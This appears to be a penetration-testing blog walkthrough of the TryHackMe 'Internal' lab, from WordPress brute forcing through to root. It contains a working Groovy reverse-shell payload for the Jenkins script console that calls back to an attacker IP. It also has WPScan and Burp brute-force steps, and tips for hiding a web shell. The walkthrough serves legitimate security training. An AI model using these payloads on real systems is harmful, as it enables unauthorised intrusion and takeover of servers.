Today we’re going to solve another boot2root challenge called “Internal”. It’s available at TryHackMe for penetration testing practice. This lab is not difficult if we have the right basic knowledge to break the labs and are attentive to all the details we find during the reconnaissance. The credit for making this lab goes to TheMayor. Let’s get started and learn how to break it down successfully.

Level: Hard

Since these labs are available on the TryHackMe website.

Penetration Testing Methodology

Reconnaissance

• Nmap

Enumeration

• Dirsearch
• WPScan
• Linpeas
• Chisel

Exploiting

• Template infection with a reverse shell.

Privilege Escalation

• Credentials in hidden and unencrypted files
• Bruteforce login Jenkins and abuse of console scripts

• Capture the flag

Walkthrough

Reconnaissance

We put the IP address in “etc/hosts” file and execute nmap.

nmap -p- -A internal.try

Enumeration

We start by accessing the web resource, we find the default page of Apache2/Ubuntu without any hint.

It is time to start dirsearch, in a moment we are going to list two directories that will call our attention.

We list WordPress deployed on the server with hardly any information.

We use WPScan for user enumeration and brute force. We will get some credentials to access as an administrator.

wpscan --url internal.try -P /root/Tools/Dics/rockyou.txt

Exploiting

Taking advantage of our privileges, we will edit the file “index.php” and insert our reverse shell. An annotation, this is something “noisy“, in a real scenario, an attacker would hide this code in another less usable file, or would create a condition with PHP so that the reverse shell would only be executed on an IP address, flag by GET, etc… in MD5 (for example).

And we will have a connection inside the machine. We execute our two favorite commands to have an interactive shell.

Privilege Escalation (user “aubreanna”)

After performing many actions for the enumeration, we found a text file that seems interesting.

We read it and it contains the credentials of the aubreanna user.

We authenticate with the user “aubreanna” and by SSH and we access his home and read the flag of “user.txt“.

Privilege Escalation (root)

We find the file “jenkins.txt”, read it and it gives us the clue that the service is running internally on an IP address on port 8080.

I used “chisel” to port forward my Kali machine to port 9000.

We access the site and find a Jenkins service, we try the credentials obtained so far (WordPress, wp-config.php, mysql…) nothing works.

We use Burp’s intruder with a dictionary of most used passwords. We will distinguish the password by its “Length“.

Jenkins has a scripting console, in it, we will insert the code below and keep a netcat listening in our machine.

String host="10.9.5.154";
int port=6666;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Exploit code:

If we have done it right, we will get access to the machine:

We repeat the move, look again for .txt files and find one called “note.txt“.

We read the file and find the root credentials!

With the credentials in our possession, we authenticate ourselves as root and read the flag.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.